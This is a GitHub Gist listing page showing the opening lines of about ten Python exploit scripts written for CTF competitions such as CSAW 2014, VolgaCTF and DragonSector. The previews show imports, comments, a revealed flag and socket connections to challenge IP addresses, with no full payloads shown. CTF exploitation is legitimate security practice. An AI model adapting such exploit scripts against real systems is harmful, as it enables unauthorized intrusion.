Skip to content

Instantly share code, notes, and snippets.

@g05u
g05u / quine_xpl.py
Created Apr 26, 2015
DragonSector CTF Quine Exploit
View quine_xpl.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
# DragonSector CTF
# exploit quine
# www.null-life.com / @_g05u_
def n2h(val, nbits = 32):
return ((val + (1 << nbits)) % (1 << nbits))
View hackt1_web.py
#!/usr/bin/env python
import struct, sys, time, re
import requests, urllib
# Volga CTF 2015
# exploit HackT - 1
# www.null-life.com / @_g05u_
pass_addr = 0x606400 #password address in bss
QUERYS = 110
@g05u
g05u / xpl_pwnie.py
Created May 3, 2015
Exploit Little Pwnie VolgaCTF
View xpl_pwnie.py
#!/usr/bin/env python
import struct, sys, time, re
from nulllife import *
import requests, urllib
# Volga CTF 2015
# exploit my little pwnie
# www.null-life.com / @_g05u_
FD = 4
@g05u
g05u / venom_solver.py
Last active Aug 29, 2015
TJCTF 2015 Venom reversing chall
View venom_solver.py
import struct, random
# TJCTF 2015 Venom reversing chall
# www.null-life.com
# @_g05u_
f = open('./venom', 'rb')
data = f.read()
f.close()
s = '1462132F222E292F'.decode('hex')
@g05u
g05u / alewife_exploit.py
Last active Aug 29, 2015
Boston ctf party alewife writeup/exploit
View alewife_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
import ast
# @_g05u_
#boston ctf party 2015
# exploit alewife chall
# www.null-life.com
@g05u
g05u / hackim_2015_mixme.py
Last active Aug 29, 2015
Hackim/nullcon CTF 2015 - mixme exploiting 400 points
View hackim_2015_mixme.py
#!/usr/bin/env python
from nulllife import *
import sys, time
# www.null-life.com
# write-up / exploit by @_g05u_
# Hackim/nullcon CTF 2015 - mixme exploiting 400 points
# Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r
c = 0x61
@g05u
g05u / csaw_2014_greenhorn_exploit.py
Created Sep 21, 2014
Exploit greenhornd CSAW 2014 CTF
View csaw_2014_greenhorn_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#greenhorn exploit
offset_data = 0x3F8
s = NullSocket("54.164.253.42", 9998)
s.readuntil("Password: ")
@g05u
g05u / csaw_2014_xorcise.py
Created Sep 21, 2014
CSAW CTF 2014 - xorcise exploit
View csaw_2014_xorcise.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#xorcise exploit
def xor(data, key):
o = ''
for i in range(len(data)):
@g05u
g05u / csaw_2014_s3.py
Created Sep 21, 2014
CSAW CTF 2014 - s3 exploit
View csaw_2014_s3.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#CSAW 2014 CTF
#s3 exploit
s = NullSocket("54.165.225.121", 5333)
s.readuntil("> ")
View ncn_explicit_exploit.py
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
#
#NoConName CTF
#explitcit exploit 500pts
#
s = NullSocket("88.87.208.163", 7070)